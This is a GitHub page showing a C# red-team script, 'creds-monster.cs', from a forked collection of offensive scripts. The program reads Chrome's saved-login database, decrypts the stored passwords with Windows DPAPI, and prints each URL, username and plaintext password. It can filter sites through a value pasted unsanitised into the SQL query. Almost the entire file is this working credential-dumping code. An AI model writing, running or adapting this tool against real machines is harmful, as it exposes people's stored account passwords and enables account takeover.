forked from Mr-Un1k0d3r/RedTeamCSharpScripts
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcreds-monster.cs
55 lines (46 loc) · 1.79 KB
/
creds-monster.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Data.SQLite;
using System.Security.Cryptography;
using System.Security;
namespace CredsMonster
{
class Program
{
static void Main(string[] args)
{
string filter = "";
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data";
string db = "Data Source=" + path + ";pooling=false";
if (args.Length >= 1)
{
filter = args[0];
Console.WriteLine("Filter is {0}", filter);
}
Console.WriteLine("DS is located at {0}", path);
SQLiteConnection conn = new System.Data.SQLite.SQLiteConnection(db);
SQLiteCommand cmd = conn.CreateCommand();
if (filter.Equals(""))
{
cmd.CommandText = "SELECT action_url, username_value, password_value FROM logins";
}
else
{
cmd.CommandText = "SELECT action_url, username_value, password_value FROM logins WHERE action_url LIKE '%" + filter + "%'";
}
conn.Open();
SQLiteDataReader result = cmd.ExecuteReader();
while (result.Read())
{
byte[] data = (byte[])result[2];
byte[] plaintext = System.Security.Cryptography.ProtectedData.Unprotect(data, null, System.Security.Cryptography.DataProtectionScope.CurrentUser);
Console.WriteLine("{0}:{1}={2}", result.GetString(0), result.GetString(1), Encoding.ASCII.GetString(plaintext));
Console.Read();
}
conn.Close();
}
}
}